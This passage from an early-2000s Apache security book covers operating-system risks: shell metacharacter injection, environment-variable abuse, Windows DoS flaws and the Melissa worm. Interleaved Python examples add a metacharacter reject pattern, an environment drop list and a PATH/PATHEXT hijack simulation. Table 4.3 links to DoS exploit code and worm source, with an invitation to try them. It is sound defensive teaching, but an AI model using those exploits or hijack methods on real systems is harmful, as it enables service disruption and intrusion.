• BeOS prior to version 4.5
• Microsoft ME
• Microsoft Windows 3.1
• Microsoft Windows 95
• Microsoft Windows 98

Note that you can secure Microsoft Windows NT and 2000 (the jury is still out on XP). However, the aforementioned Microsoft operating systems substantially contribute to Microsoft leading the pack for vulnerabilities.


Figure 4.1 demonstrates vulnerabilities among several popular operating systems since June 1997.

FIGURE 4.1 Vulnerabilities by operating system, June 1997—January 2002.

Microsoft commanded a staggering 63%, or some 500 vulnerabilities, during that time. To its credit, in recent months, Microsoft has undertaken a major policy shift and is now allocating substantial resources to improving its product security.

NOTE

The statistics for Figure 5.1 came from SecurityFocus’ (http://www.securityfocus.com) security vulnerability list. SecurityFocus is an excellent resource for up-to-the-minute information on vulnerabilities. Its archive reaches back to 1989.


Clearly then, your choice of operating system has a strong bearing on your Web 
host’s security. Each operating system introduces additional environmental risks that 
you must address. Let’s look at those now. 


Environmental Risks Common to Unix

Unix has two chief environmental risks to consider:

• Shells
• Unix’s inherent complexities

Because we’ve already covered running services in Chapter 2, “The Risks: Cracking Apache,” we’ll move on to shells and Unix’s inherent complexities.


Shells 


Like Windows, Unix relies on one or more command interpreters, or shells. Shells 
accept user commands from a keyboard (or other sources) and communicate these to 
the underlying operating system. From there, several things can happen, although 
generally, shells find the command the user invoked, execute it, and return either 
standard output (STDOUT) or standard error output (STDERR). 


With the exception of logging, CGI, and SSI operations, Apache doesn’t much use 
shells. However, that’s rather like saying that except for generic user commands, 
Windows rarely uses COMMAND.COM. Most Apache administrators will eventually want 
to pipe logs to processes, run CGI, and incorporate Server Side Includes in at least 
some of their projects. 


Shells you’ll encounter in Unix environments (and at least in one case, Windows 2000) include the following:

• ash
• bash
• csh
• ksh
• sh
• tcsh
• zsh


We'll cover secure programming in Chapter 12, “Hacking Secure Code: Apache at Server Side,” and Chapter 13, “Hacking Secure Code: Apache at Client Side,” but here, it’s worth noting that anytime Unix spawns a shell, the potential for security issues arises. Indeed, attackers often (but by no means always) escalate their privileges or circumvent security controls by forcing Apache to call a shell.


In many instances, Web server security breaches arise not because Apache has any inherent security weakness, but instead because attackers find ways to invoke shells on the target. After having achieved this, attackers can push malicious code onto the shell’s argument stack. The shell—unaware that this code is unwanted and unauthorized—dutifully executes it.


One cause of such mishaps is that system administrators, developers, and Web 
administrators fail to filter or otherwise validate user input. When this happens, 
attackers can sometimes use metacharacters (special characters that shells interpret in 
unique ways) to execute malicious code. In Chapters 12 and 13, we’ll address these 
issues at length, but here, a single example will suffice. 


On December 31, 2001, a user calling himself BrainRawt revealed a weakness in a popular CGI tool named Last Lines. Last Lines, from Matrix’s CGI Vault, is a free, Perl-based CGI tool that prints x number of lines from a specified log file to a specified Web page. It’s a tool to monitor your logs remotely through a Web interface.

BrainRawt found that Last Lines 2.0, when coupled with Apache 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22, left a gaping security hole. The script didn’t filter metacharacters properly, and therefore enabled remote attackers to examine any Web-readable directory. On servers where administrators foolishly placed htpasswd password databases within the Web directory hierarchy in either plain text or DES-encoded files, attackers could obtain username/password pairs. This could, under certain circumstances, enable attackers to gain not merely unauthorized Web access, but also root access.


Another shell issue surrounds environment variables. Environment variables—either those that developers permanently set at login or startup, or those that they set at runtime—have a strong bearing on program execution. If attackers can somehow introduce erroneous environment variable values, they can alter a program’s behavior, and perhaps instruct it to perform unwanted and unauthorized tasks. Table 4.1 identifies several such variables.
TABLE 4.1 Shell Environment Variables

Variable    Purpose

$-          Stores the current shell’s flags.

$!          Stores the PID of the last command executed in the background.

$#          Stores the number of positional parameters ($1, $2, $3, and so on).

$$          Stores the PID of the current shell.

$0          Stores the name of the program currently being executed.

$CDPATH     Identifies the search path used when you issue the cd (change directory) command.

$HOME       Identifies the location of your home directory.

$IFS        The Internal Field Separator; stores the character(s) used for field separation.

$LIBPATH    Identifies the search path for shared libraries.

$LOGNAME    Stores your username.

$MAIL       Stores the location of your mailbox. (From this, the shell knows where to find your mail.)

$PATH       Stores the list of all directories the shell will search when looking for commands.

$PS1        Identifies what your system prompt will look like. For example, on my machine, the PS1 variable is set to $.

$SHACCT     Stores a filename (a file which is writable by the current user) that holds an accounting record of all shell procedures.

$SHELL      Stores the shell’s path.

$TERM       Identifies the current terminal type. Your terminal type can be very important. Unix uses this to determine how many characters and lines to display per screen.

$TIMEOUT    (Unix) Stores the number of minutes of inactivity after which the shell exits.

$TZ         Identifies the current time zone. For manipulation of time zone values in VC++ (including _daylight, timezone, and _tzname), check the _tzset function, available from time.h. If you don’t set TZ beforehand, programs take time zone values from the operating system’s current settings.





Apache does not include utilities that scrupulously investigate either characters or 
shell environment variables, nor should it. This isn’t Apache’s job. You must address 
these issues independently. 
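The two controls this paragraph leaves to you, rejecting shell metacharacters in user input (the Last Lines problem above) and scrubbing the environment before any child process runs (the Table 4.1 variables), as an added Python example; it is not code from the book, from Last Lines, or from Webmin. The log directory, file names and sample log lines are constructed for the demonstration, and the example assumes a POSIX tail in /usr/bin or /bin.

```python
"""Hardened 'last N lines of a log' handler (illustrative example, not the
Last Lines CGI): reject shell metacharacters, confine the file to a log
directory, and spawn tail with a scrubbed environment and no shell."""
import os
import re
import subprocess
import tempfile

# Characters a shell interprets specially. Input is rejected, not "cleaned":
# stripping can be bypassed and leaves the intent of the input ambiguous.
SHELL_META = re.compile(r"""[;&|<>`$(){}\[\]*?!~"'\\\s]""")

# Allowlist for a log name: a bare file name, no directory separators.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# Table 4.1 variables (plus the loader's LD_* family) that must never reach a
# child with attacker-influenced values. A CGI inherits the server's environment.
DROP_ENV = {"IFS", "CDPATH", "PATH", "LIBPATH", "SHELL", "ENV", "BASH_ENV"}


def clean_environment(base_env=None):
    """Return a minimal environment for a child process.

    Every variable in DROP_ENV and every LD_* variable is removed; PATH and
    IFS are then pinned to known-good values so the child cannot be steered."""
    source = os.environ if base_env is None else base_env
    env = {k: v for k, v in source.items()
           if k not in DROP_ENV and not k.startswith("LD_")}
    env["PATH"] = "/usr/bin:/bin"
    env["IFS"] = " \t\n"
    return env


def validate_request(name, count):
    """Validate a user-supplied log name and line count.

    Raises ValueError for anything but a plain, visible file name and a small
    positive line count. Hidden files (for example .htpasswd) are refused."""
    if not isinstance(name, str) or SHELL_META.search(name):
        raise ValueError("log name contains shell metacharacters")
    if not SAFE_NAME.match(name) or name.startswith("."):
        raise ValueError("log name is not an allowed file name")
    if not re.fullmatch(r"[0-9]{1,4}", str(count)) or not 1 <= int(count) <= 1000:
        raise ValueError("line count must be an integer between 1 and 1000")
    return name, int(count)


def last_lines(log_dir, name, count):
    """Return the last `count` lines of log_dir/name.

    The file is confined to log_dir (symlinks resolved), and tail runs from an
    argv list with a scrubbed environment, so no shell ever parses the input."""
    name, count = validate_request(name, count)
    root = os.path.realpath(log_dir)
    path = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(path) != root or not os.path.isfile(path):
        raise ValueError("log file is missing or outside the log directory")
    result = subprocess.run(["tail", "-n", str(count), path],
                            capture_output=True, text=True,
                            env=clean_environment(), check=True)
    return result.stdout.splitlines()


def rejects(name, count):
    """True if validate_request refuses the input (used by the self-check)."""
    try:
        validate_request(name, count)
    except ValueError:
        return True
    return False


def demo_with_constructed_log():
    """Self-check on a constructed five-line log: returns its last two lines."""
    with tempfile.TemporaryDirectory() as log_dir:
        with open(os.path.join(log_dir, "access.log"), "w") as fh:
            fh.write("".join(f"line{i}\n" for i in range(1, 6)))  # constructed data
        return last_lines(log_dir, "access.log", "2")


if __name__ == "__main__":
    print(demo_with_constructed_log())   # ['line4', 'line5']
    print(rejects("access.log;id", 5))   # True
```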


We'll study environment variables in Chapters 12 and 13, but one example is worth revisiting. On May 26, 2001, J. Nick Koston, an independent researcher, identified a serious vulnerability in Webmin when incorporated with Apache. Versions Webmin 0.5x, Webmin 0.6, Webmin 0.7, Webmin 0.8.3, Webmin 0.8.4, Webmin 0.80, and Webmin 0.85 were all affected.

Webmin is a management system for Apache servers, written in Perl, that enables Web administrators to manage a Web host (including the greater file system’s security and which daemons run). The problem Mr. Koston demonstrated was that Webmin’s Perl-based CGI could, under certain circumstances, reveal your login and password in a base64-encoded URL that carried these values as environment variables. Under certain conditions, this gave attackers root access.


Unix’s Inherent Complexities 


Another inherent risk of Unix is its complexity. Few systems harbor as many utilities 
as Unix does—and many such utilities aren’t apparent to new users because they 
reside in the underlying file system. (The X Window System gives no indication of 
their existence.) 


As I'll relate in Chapter 8, “Overlording Apache Server: General Administration,” 
these utilities carry widely disparate permissions. Some—although they remain in 
the minority—even demand root or administrative access. When a hole surfaces in 
any such utility, it can place your system at risk. 


Furthermore, managing permissions on Unix systems can be cumbersome and 
complicated. Sometimes this is a file system issue (the default installation applies 
erroneous permissions), sometimes it’s an administrative issue (you erroneously 
assign permissions), and sometimes it’s a software problem (third-party tool authors 
set incorrect or overly permissive access rights in their packages). 


Finally, Unix supports shell accounts, and in many situations, such as where you have multiple programmers working on a development project, you’ll likely grant one or more individuals shell access. You might provide this access locally, through telnet, rlogin, or ssh, but it amounts to the same thing: shell access.

Never grant shell access frivolously. If you can provide users or your developers with critical services without giving them shell access, do it. Shell access invites trouble. The more users that have shell access, the more likely that you’ll experience an internal security breach.


NOTE

Mischievous shell users can exploit files and services that remote attackers can’t. A remote attacker must first gain shell access before exploiting internal holes; a valid shell user is already halfway there. But shell users needn't be malicious to cause problems. Even innocent behavior can erode security, such as when users create rhosts files.

Unix vulnerabilities attributable to and accessible by local users exceed remote vulnerabilities by a huge margin—at least 30 to 1. That is, for every remote hole Unix has had since 1989, it’s had 30 local holes—holes that only folks with shell access can exploit.


Hence, when building a Unix network, if you must grant users shell access, reduce 
your risks by taking these steps: 


• Dedicate a machine specifically for shell access. 

• Restrict that machine to shell use only. 

• Strip it of nonessential network services. 

• Install a generic application set and partition the drives with disaster recovery 
in mind. (In other words, expect frequent reinstallations. Shell machines get 
thrashed regularly.) 

• Prohibit relationships of trust between shell and other machines. 

• Redirect logs to a log server, or, if your budget permits, write-once media, and 
log everything. 


Equally, if you’re setting up just a single Unix box, the same basic rules apply—grant 
shell access only to those who need it. Indeed, be wary of granting shell access to 
anyone (other than you, of course) that hacks or cracks. Otherwise, besides the risk 
that they might trash your machine, you might end up taking the rap for something 
they did from your IP. 
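Two of the steps above, prohibiting trust relationships and shipping logs off the box, are easy to check for after the fact. The following audit script is an added example, not code from the book: it walks a directory tree for rhosts-style trust files (.rhosts, .shosts, hosts.equiv, shosts.equiv), flags the wildcard "+" entries that trust every host, and checks whether a syslog.conf forwards anything to a remote log host. The sample home directories and syslog.conf text it uses are constructed inline, so it runs offline; point find_trust_files at / on a real shell host.

```python
"""Audit a Unix shell host for rhosts-style trust files and missing remote logging.

Added example (not from the book). The sample tree and syslog.conf text below
are constructed for the demonstration.
"""
import os
import re
import tempfile

TRUST_FILES = {".rhosts", ".shosts", "hosts.equiv", "shosts.equiv"}

# A line of "+" (optionally "+ +" or "+ user") trusts every host.
WILDCARD_RE = re.compile(r"^\s*\+(\s+\S*)?\s*$")

# A non-comment syslog.conf line whose action is "@host" (or rsyslog's "@@host")
# forwards that selector to a remote log host.
REMOTE_ACTION_RE = re.compile(r"^\s*[^#\s]\S*\s+@@?[A-Za-z0-9._-]+")


def find_trust_files(root):
    """Return sorted paths of rhosts-style trust files under root."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in TRUST_FILES:
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def wildcard_entries(path):
    """Return the lines in a trust file that grant wildcard (+) trust."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\n") for line in fh if WILDCARD_RE.match(line)]


def syslog_forwards_remotely(conf_text):
    """True if any active syslog.conf line sends a selector to a remote host."""
    return any(REMOTE_ACTION_RE.match(line) for line in conf_text.splitlines())


def audit(root, syslog_conf_text):
    """Every trust file is a finding; wildcard trust is rated HIGH."""
    findings = []
    for path in find_trust_files(root):
        wild = wildcard_entries(path)
        findings.append(("HIGH" if wild else "MEDIUM", path, wild))
    if not syslog_forwards_remotely(syslog_conf_text):
        findings.append(("MEDIUM", "syslog.conf", ["no remote log host configured"]))
    return findings


def build_sample_tree():
    """Constructed sample: two home directories, one with a '+ +' .rhosts."""
    root = tempfile.mkdtemp(prefix="shellaudit-")
    os.makedirs(os.path.join(root, "home", "alice"))
    os.makedirs(os.path.join(root, "home", "bob"))
    with open(os.path.join(root, "home", "alice", ".rhosts"), "w") as fh:
        fh.write("+ +\n")                       # trusts every host and every user
    with open(os.path.join(root, "home", "bob", ".rhosts"), "w") as fh:
        fh.write("devbox.example.com bob\n")   # narrower, but still a trust relationship
    return root


# Constructed syslog.conf fragments: one logs locally only, one forwards everything.
SAMPLE_SYSLOG_LOCAL = "*.info;mail.none   /var/log/messages\n"
SAMPLE_SYSLOG_REMOTE = "# forward everything\n*.*   @loghost.example.com\n"

if __name__ == "__main__":
    for severity, what, detail in audit(build_sample_tree(), SAMPLE_SYSLOG_LOCAL):
        print(severity, what, detail)
```

The two regexes are deliberately conservative: a file that names specific hosts is still reported, because the checklist says to prohibit trust relationships outright, not merely wildcard ones.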


Environmental Risks Common to Windows 


Windows harbors the same inherent weaknesses that Unix does, plus a few more. 
Certainly, Windows account access is similar in scope and risk to Unix shell access. 
Moreover, Windows security also depends in some degree on environment variables, 
and attackers can exploit that. Table 4.2 lists common Windows environment 
variables. 


TABLE 4.2 Environment Variables in Windows 

Variable                  Purpose 

A-MSSQL-DATABASE          Microsoft SQL Server-related; specifies the database to be accessed 
A-MSSQL-LOGIN             Microsoft SQL Server-related; specifies the username you'll use to 
                          connect to the database 
A-MSSQL-PASSWD            Microsoft SQL Server-related; specifies the password for the user 
                          associated with the A-MSSQL-LOGIN variable 
BASEDIR                   The build's base directory 
BUILD_DEFAULT             Default arguments you'd like to always pass to build 
BUILD_DEFAULT_TARGETS     Default switches you'd like to always pass to build 
BUILD_MAKE_PROGRAM        Your build make utility (generally, nmake.exe) 
BUILD_OPTIONS             Specifies that build should traverse additional, optional directories 
                          when building a project 
C_DEFINES                 Switches you'll always pass to the C compiler 
CC                        MySQL-related; points to your C compiler (needed when using the 
                          configure utility) 
CXX                       MySQL-related; points to your C++ compiler (needed when using the 
                          configure utility) 
CFLAGS                    Specifies the flags for your C compiler (MySQL) 
CLASSPATH                 The path to your Java classes 
COMSPEC                   The path of the command interpreter (cmd.exe or command.com); 
                          command.com originally used it to find and reload its transient 
                          portion from disk 
CRT_INC_PATH              The location of W2K include files 
CRT_LIB_PATH              Microsoft C-based import libraries 
CVS_CLIENT_LOG            The debug log for CVS in client-server mode 
CVS_CLIENT_PORT           When using CVS in concert with Kerberos authentication, this 
                          specifies the CVS client port 
CVS_PASSFILE              The CVS password file 
CVS_RCMD_PORT             Specifies the RCMD port to use with CVS 
CVS_RSH                   When using CVS with rsh, this specifies the rsh program to use 
CVS_SERVER                When using CVS with rsh, this specifies the location of the CVS 
                          server program 
CVSEDITOR                 Specifies the editor to use when working with CVS 
CVSIGNORE                 Filename patterns that CVS should always ignore 
CVSROOT                   The directory of CVS's root repository 
CVSUMASK                  Specifies file permissions of files created by CVS (Note that if you 
                          use CVS on Windows, you might experience file permission 
                          problems. If you're accessing CVS via Samba, you can fix these by 
                          specifying WRITE=YES in your Samba config file.) 
CVSWRAPPERS               Filename patterns that CVS should use as wrappers 
CXXFLAGS                  Specifies the flags for your C++ compiler (MySQL) 
CYGROOT                   Related to Cygnus tools (the Cygwin development suite); specifies 
                          Cygwin's home 
DB2PATH                   Points to the DB2 CLI location 
DBI_TRACE                 Specifies tracing in Perl DBI (MySQL) 
DBI_USER                  Specifies the default user name for Perl DBI (MySQL) 
DDK_INC_PATH              Path to Microsoft's DDK header files 
DDK_LIB_PATH              Path to Microsoft's DDK library files 
ERRNO                     The last error condition returned by system calls (Korn shell, which 
                          runs on W2K) 
FLEXLM_BATCH              Relates to the FLEX license manager; prevents popup notifications 
                          from appearing 
FLEXLM_DIAGNOSTICS        Relates to the FLEX license manager; gives you extra diagnostics (for 
                          tools that don't generate debug logs) 
HOME (MySQL)              The directory in which the mysql client keeps its .mysql_history file 
HOMEDRIVE                 A sensitive variable; specifies the default drive (typically C:) 
HOMEPATH                  The default directory for Windows users on the current box 
INCLUDE                   Your include file path 
INFORMIXDIR               Points to the ESQL/C path 
ISO8859                   CVS-related variable that specifies that the system should use 
                          ISO Latin-1 text file encoding 
JAVA_HOME                 Java's home directory (C:\Java, JDK1.1.8, and so on) 
LIB                       Your library path 
LINENO                    Current line number of a script (ksh) 
LM_LICENSE_FILE           The license manager file location (FLEX) 
LOGONSERVER               The name of the logon server 
MAKE_MODE                 Describes the make mode (Unix or Windows) 
MSDevDir                  The development directory, or wherever you have Visual Studio 
                          installed 
MYSQL_PWD                 The default MySQL password (Don't set this.) 
MYSQL_TCP_PORT            The default TCP/IP port for use with MySQL 
NTVERSION                 A legacy variable; reports the version 
NUMBER_OF_PROCESSORS      The number of processors on the current system 
ODBC                      Points to the ODBC library and header files 
ORACLE_                   Points to Oracle's path 
ORACLE_HOME               Points to Oracle's path 
OS                        Identifies the operating system 
PATHEXT                   A sensitive variable, because it lists the file extensions cmd.exe 
                          treats as executable when resolving a bare command name (for 
                          example, .exe, .com, .cmd, and so on) 
PROCESSOR_ARCHITECTURE    The current machine's processor architecture (generally x86, but 
                          could be MIPS or Alpha) 
PROCESSOR_IDENTIFIER      Processor ID of the user's workstation, as in x86 Family 5 Model 2 
                          Stepping 4, GenuineIntel 
PROMPT                    The command prompt style 
PYTHONPATH                The path to Python's distribution 
RCSBIN                    The path to binary files (CVS) 
SQLSERVER                 Points to the DB-Library path 
SWING_HOME                The location of the Swing libraries (Java) 
SYBASE                    Points to the location of CT-Library or DB-Library 
SYSTEMROOT                The location of Windows NT's root directory (typically, C:\WINNT) 
TARGETLIBS                Points to SDK libraries (kernel32.lib, user32.lib, and so on) 
TCL_LIBRARY               The Tcl library location 
TMOUT                     The number of seconds of inactivity after which the shell exits (ksh) 
TMP or TEMP               A directory for storing temporary files 
USER                      The default Windows user in relation to mysqld 
USERDOMAIN                The user's current domain 
WDM_INC_PATH              Path to Microsoft WDM header files 
WINDIR                    See SYSTEMROOT 
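Why the table calls PATHEXT (and, by extension, PATH and the current directory) sensitive is easiest to see by emulating the lookup. The following is an added example, not from the book: it models the cmd.exe search order as I understand it (the current directory first, then each PATH entry in order, and within a directory each PATHEXT extension in order) against a constructed set of file paths standing in for the filesystem, so nothing is executed. The file names, directories, and the hijack_possible helper are assumptions made for the demonstration.

```python
"""Emulate cmd.exe command resolution to show how PATH and PATHEXT get abused.

Added example, not from the book. The search order below (cwd, then PATH
entries; within a directory, PATHEXT extensions in order) is my model of the
documented cmd.exe behaviour; the "filesystem" is a constructed set of paths.
"""

DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH"


def resolve_command(name, cwd, path, pathext, existing_files):
    """Return the file cmd.exe would run for `name`, or None if nothing matches.

    existing_files is a set of full paths; matching is case-insensitive as on
    Windows. A name that already carries an extension is tried as-is.
    """
    lookup = {p.lower(): p for p in existing_files}
    search_dirs = [cwd] + [d for d in path.split(";") if d]
    extensions = [e for e in pathext.split(";") if e]
    has_extension = "." in name.rsplit("\\", 1)[-1]
    candidates = [name] if has_extension else [name + e for e in extensions]
    for directory in search_dirs:
        for candidate in candidates:
            full = directory.rstrip("\\") + "\\" + candidate
            if full.lower() in lookup:
                return lookup[full.lower()]
    return None


# Constructed filesystem: the legitimate build tool, plus a file an attacker
# dropped into a world-writable temp directory (hypothetical paths).
SAMPLE_FS = {
    "C:\\Tools\\nmake.exe",
    "C:\\Temp\\nmake.com",
}


def hijack_possible(name, cwd, path, pathext=DEFAULT_PATHEXT, fs=SAMPLE_FS):
    """True if `name` resolves to anything outside the trusted C:\\Tools directory."""
    hit = resolve_command(name, cwd, path, pathext, fs)
    return hit is not None and not hit.lower().startswith("c:\\tools\\")


if __name__ == "__main__":
    print(resolve_command("nmake", "C:\\Users\\dev", "C:\\Tools;C:\\Temp",
                          DEFAULT_PATHEXT, SAMPLE_FS))   # C:\Tools\nmake.exe
    print(resolve_command("nmake", "C:\\Users\\dev", "C:\\Temp;C:\\Tools",
                          DEFAULT_PATHEXT, SAMPLE_FS))   # C:\Temp\nmake.com
    print(resolve_command("nmake", "C:\\Temp", "C:\\Tools",
                          DEFAULT_PATHEXT, SAMPLE_FS))   # cwd wins: C:\Temp\nmake.com
```

Three things fall out of the model: a writable directory ahead of the real one in PATH wins; the current directory beats PATH entirely, so a build started from an untrusted directory picks up whatever sits there; and because .COM precedes .EXE in PATHEXT, an attacker who can write into the trusted directory itself only needs a file with an earlier extension. Invoking tools by full path, with the extension, sidesteps all three.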





Beyond the issues already mentioned, Windows has other problems, including a 
historically high susceptibility to viruses, worms, and denial-of-service (DoS) attacks. 


Tens of thousands of viruses for Windows exist, and more surface each day. Many 
have evolved well beyond simple boot-sector (MBR) and data-file viruses, and some 
spread like wildfire. (Viruses for Unix are rare, largely because Unix's permissions 
scheme and structure make it an inhospitable environment.) Hence, if you choose 
Windows, build the price of a good virus scanner—and annual license updates—into 
your total cost. 


Worms represent a similar issue, but are far more threatening. Like viruses, worms 
can arrive as file attachments, but once running they spread on their own. A worm 
infects one machine, rifles through that machine's files for the addresses of other 
targets, and then commandeers services on the infected machine (a mail client, for 
instance) to seek out and infect those targets. 


The most instructive example is Melissa, a worm that a New Jersey resident report- 
edly released on March 26, 1999. The man packaged Melissa as a Word 97 macro 
virus, but Melissa had characteristics security experts hadn’t seen before, at least not 
on that scale. Melissa’s author released it into a Usenet group, and just 72 hours 
later, the Computer Emergency Response Team reported more than 100,000 
confirmed infected hosts. 


An advisory from the Department of Energy’s Computer Incident Advisory 
Capability solemnly reported that even their systems were not immune: 


A new Word 97 macro virus named W97M.Melissa has been detected at multiple DOE sites 
and is known to be spreading widely. In addition to infecting your copy of Microsoft Word, 
the virus uses Microsoft Outlook 98 or Outlook 2000 to e-mail the infected document to the 


first 50 people from each of your Outlook address books. 
CIAC Information Bulletin, J-037A: W97M.Melissa Word Macro Virus. 
(http://www.ciac.org/ciac/bulletins/j-037.shtml) 


NOTE 


If you’re interested in running Melissa in a test environment, get the source code at 
http://john.helgo.net/~john/files/melissa.txt. 





Finally, Windows has a long record of DoS weaknesses, and many of these illustrate 
succinctly why and how your operating system can undermine Apache's otherwise 
excellent security. More than a dozen Windows utilities, services, or applications— 
that have no relation to Web services—have harbored denial-of-service weaknesses. 
Table 4.3 lists a few examples. 


TABLE 4.3 Significant Windows DoS Vulnerabilities 

Attack                    Description 

MSDTC DoS 
    This affects the Microsoft Distributed Transaction Coordinator on Windows 
    2000 Advanced Server, Windows 2000 Datacenter Server, and SQL Server 6.5 
    (and higher). Remote attackers crash the service by sending 1024 bytes of 
    garbage to port 3372 (the default for MSDTC). palante@subterrain.net 
    reported this vulnerability on January 31, 2002, and as of this writing, no 
    solution exists. Check http://www.microsoft.com/technet/security for more 
    information. 

Site Server DoS 
    Site Server is an integrated solution for corporate intranets, and enables 
    users, via cphost.dll, to upload files. Rain Forest Puppy reported on 
    January 29, 2002, that if users initiate an upload with a target URL of 
    more than 250 characters, they can plant a temp file (or several) on the 
    target, and eventually eat all disk space. As of this writing, no solution 
    (other than disabling Site Server) exists. Check 
    http://www.microsoft.com/technet/security for more information. 

XP .manifest DoS 
    On XP, the .manifest file contains XML instructions related to how the 
    desktop behaves. In XP Home and Professional, if attackers (local or 
    remote) can alter this XML, they can cause DoS conditions (or worse). As 
    of this writing, Microsoft has issued no patch or discussion. 

MSIE Form DoS 
    If you manage a Windows-based machine and use MSIE 5.5, 5.5 SP1, or 
    5.5 SP2, remote Webmasters can craft a special form that will hang your 
    machine. As of this writing, Microsoft has issued no patch or discussion. 

MSIE Modeless Dialog DoS 
    If you manage a Windows-based machine and use MSIE 5.5, 5.5 SP1, 
    5.5 SP2, or 6.0, remote Webmasters can use HTML containing a modeless 
    dialog box that will hang your machine. As of this writing, Microsoft has 
    issued no patch or discussion. 

MS UPnP DoS 
    Microsoft's Universal Plug and Play, a feature that enables Windows-based 
    machines to detect and auto-configure devices, is vulnerable to DoS. In 
    Windows 98, 98SE, ME, XP Home, and XP Professional, UPnP uses the Simple 
    Service Discovery Protocol. Remote attackers can send a custom-crafted UDP 
    packet that will hang affected, unpatched systems. The patch can be found 
    at http://download.microsoft.com/download/whistler/Patch/Q315000/WXP/ 
    EN-US/Q315000_WXP_SP1_x86_ENU.exe. 

MSIE Refresh DoS 
    On all recent Windows versions, MSIE 5.5, 5.5 SP1, 5.5 SP2, and 6.0 are 
    vulnerable to a JavaScript-based DoS attack. The degree to which this eats 
    your memory depends on how long you let the condition continue. To date, 
    Microsoft hasn't issued a patch or discussion (you might have to wait for a 
    new release). The attack is simple: in JavaScript, malicious Webmasters 
    assign the current document's own location back to itself, triggering an 
    endless reload. 

Internet Key Exchange DoS 
    IPSEC uses the Internet Key Exchange (IKE) standard on port 500 (in part) 
    to handle key swaps. Remote attackers can knock out the service (and 
    possibly, victim systems, which, at this point, remain limited to Windows 
    2000) by connecting to port 500 on the target and issuing a packet flood. 
    Try it on your system to test your weakness, with the code at 
    http://downloads.securityfocus.com/vulnerabilities/exploits/nb-isakmp.c. 
    As of this writing, no solution exists, other than filtering who can reach 
    port 500. 

ISA DoS 
    Internet Security and Acceleration Server is a proxy and firewall tool most 
    commonly deployed on Windows 2000 Server and Advanced Server. ISA servers 
    choke when pummeled with fragmented UDP packets. To date, no solution 
    exists. 

GDI DoS 
    In Windows 2000 and XP, the Graphics Device Interface (GDI), when 
    receiving malformed requests, chokes and blue-screens the targeted 
    machine. To see whether your system is vulnerable, try the code at 
    http://downloads.securityfocus.com/vulnerabilities/exploits/win32gdi-dos.txt. 
    To date, no patch has been issued, nor has Microsoft issued discussion 
    about the issue. 

RDP DoS 
    Windows 2000 Server SP2, 2000 Server SP1, 2000 Server, and NT Terminal 
    Server 4.0 are all vulnerable to Remote Desktop Protocol (RDP) attacks. 
    Remote attackers can kill the service (and possibly, down the targeted 
    machine) by sending a flurry of malformed RDP packets to targets. Test 
    your system with the code available directly from 
    http://www.securityfocus.com/data/vulnerabilities/exploits/rdpdos.zip. 
    SecurityFocus points to patches for various releases at 
    http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=solution&id=3445. 

LPC DoS 
    The Local Procedure Call (LPC) system performs interprocess communication 
    on the local Windows 2000 machine, and handles such communication between 
    client and server processes—and a host of other processes. Typical LPC 
    transactions take place between the process and object managers. In 
    unpatched Windows 2000 systems, attackers can send a malformed request 
    that snags all subsequent messages in a restricted memory area. This will 
    consume all available memory. The fix can be downloaded directly from 
    http://download.microsoft.com/download/win2000platform/Patch/Q266433/NT5/ 
    EN-US/Q266433_W2K_SP2_x86_en.EXE. (Note that this link will trigger an 
    immediate download of an executable.) 





Other Environmental Risks 


Beyond the aforementioned, you might encounter many other environmental risks 
related to your operating system. Most often, these will manifest through third-party 
applications you deploy that harness Windows’ underlying infrastructure. For this 
reason, you should closely study any third-party tool’s architecture before deploying 
it live. Such weaknesses are otherwise impossible to anticipate. 


Summary 


This chapter demonstrated that your operating system might easily undermine 
Apache’s fine security features. To avoid this situation, observe these basic points: 


• Choose an operating system that—at a minimum—offers discretionary access 
control (Windows NT, Windows 2000, Windows Datacenter Server, Plan 9 from Bell 
Labs, or any variety of Unix). 


• Choose an operating system that you (or whoever will administrate your Web 
host) know well. 


• Unless you're a BSD wizard, choose an operating system that offers at least 
baseline technical support. 


• Watch security lists often, and when your operating system vendor issues 
patches or security updates, install these immediately. 


Next, we move on to the most likely application you’ll use in concert with Apache: 
your database. 
Apache, Databases, and Security 


IN THIS CHAPTER 

• Apache Database Support 
• Apache and Proprietary Databases 
• Apache and MySQL 
• PostgreSQL 
• Apache and Commercial SQL Packages 
• General Database Security Measures 


To capture and retain users, your site must provide dynamic functionality, and no 
service is more dynamic than one that provides Web-to-database access. Hence, most 
Apache administrators at some point face database integration issues. And 
databases, like most tools that interface with Apache, raise security issues. This 
chapter looks at those issues. 


Apache Database Support 


Through either native or third-party tools and modules, Apache has long provided 
database support. Databases and database technologies that Apache now 
supports—natively or otherwise—include the following: 

• Microsoft Access 
• Adabas 
• DB2 
• DBI 
• LDAP 
• miniSQL 
• mSQL 
• MySQL 
• ODBC 
• Oracle 
• PostgreSQL 
• SOLID 
• SQL Server 
• Sybase 
• YARD 


The aforementioned products by no means represent all databases or database tech- 
nologies Apache supports. They’re merely the most well-known examples. Each 

introduces security issues. Some arise only when you deploy them with Apache, and 
others arise no matter what Web server or operating system you deploy underneath. 


Because in the final analysis it doesn’t matter how your Web host falls, I deemed 
these issues appropriate to discuss here. Although the problems are seldom attribut- 
able to Apache alone, they’ll bring your Web host down anyway. 


Apache and Proprietary Databases 


Proprietary databases can sometimes harbor holes that remain unknown until 
attackers exploit them. I strongly urge you to choose either a pre-existing, enterprise- 
worthy database management system (DBMS) that ships in open source, or a pre- 
existing, enterprise-worthy DBMS that’s well known and rigorously tested. 


Without disparaging your personal coding practices, I advise you that the propri- 
etary database solution most likely to harbor unknown holes could be one you 
create yourself. A database system that you write from scratch might harbor security 
issues without your knowledge. Secure programming practices are more elusive than 
they initially seem. 


Points to consider: 


e Your choice of data formats, unless you get creative, is limited. You can go with 
tabled or XML-based data types (or other structures easily accessible via ODBC 
or standard SQL statements and commands). This is great. With luck, you 
might slide by. However, crackers often crack such systems, chiefly because 
these storage mechanisms often rely on permissions alone. Rather than write 
such applications and grapple with complicated logic to simulate table, row, 
record, or field locking, why not choose a pre-existing, well-tested system? 


